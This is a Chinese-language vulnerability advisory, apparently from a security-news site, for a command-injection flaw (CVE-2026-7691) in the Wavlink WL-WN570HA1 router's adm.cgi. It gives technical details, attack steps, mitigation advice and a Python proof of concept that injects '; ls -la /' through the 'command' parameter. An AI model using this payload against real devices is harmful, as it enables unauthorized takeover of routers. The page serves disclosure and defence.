CVE-2026-7691 CVSS 6.3 中危

CVE-2026-7691 Wavlink WL-WN570HA1远程命令注入漏洞

披露日期: 2026-05-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7691

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wavlink WL-WN570HA1

漏洞概述

Wavlink WL-WN570HA1路由器R70HA1 V1410_221110版本存在安全漏洞。漏洞位于/cgi-bin/adm.cgi文件的set_sys_cmd函数中，由于对command参数处理不当，导致命令注入。攻击者可利用该漏洞在无需用户交互的情况下，仅需低权限即可远程发起攻击，执行任意系统命令。鉴于该产品已停止支持，建议用户尽快采取隔离措施或更换设备。

技术细节

该漏洞源于Wavlink路由器Web管理接口代码中的输入验证缺失。受影响的组件是/cgi-bin/adm.cgi中的set_sys_cmd函数，该函数负责处理系统配置命令。在接收到用户请求时，程序直接提取'command'参数并将其传递给底层的系统调用函数（如system()或popen()），而未对特殊字符进行过滤或转义。攻击者可以通过发送包含Shell元字符（如;、|、&）的恶意HTTP POST/GET请求，拼接并执行任意操作系统命令。由于CVSS向量显示攻击复杂度低且无需用户交互，一旦注入成功，攻击者即可获得设备控制权，造成数据泄露或服务中断。

攻击链分析

STEP 1

侦查

攻击者扫描网络，识别出运行Wavlink WL-WN570HA1固件版本R70HA1 V1410_221110的目标设备。

STEP 2

漏洞利用

攻击者向目标设备的/cgi-bin/adm.cgi端点发送特制的HTTP POST请求，在'command'参数中注入恶意Shell命令。

STEP 3

命令执行

由于后端未过滤特殊字符，设备将恶意参数传递给系统Shell执行，攻击者获得设备控制权。

STEP 4

后渗透

攻击者利用获得的Shell权限读取敏感信息、安装后门或进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable device
target_url = "http://<target_ip>/cgi-bin/adm.cgi"

# The vulnerable parameter is 'command'.
# Example payload to execute 'ls' command via command injection.
# Payload uses a semicolon to chain commands.
payload = "; ls -la /"

data = {
    "command": payload,
    # Other parameters might be required depending on the actual request structure
}

try:
    response = requests.post(target_url, data=data, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Wavlink WL-WN570HA1 R70HA1 V1410_221110

防御指南

临时缓解措施

由于厂商已停止对该产品的支持且不再提供补丁，唯一的临时缓解措施是将设备放置在内网防火墙之后，阻断来自互联网的80/443端口访问，并尽可能关闭远程管理功能。强烈建议更换设备。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表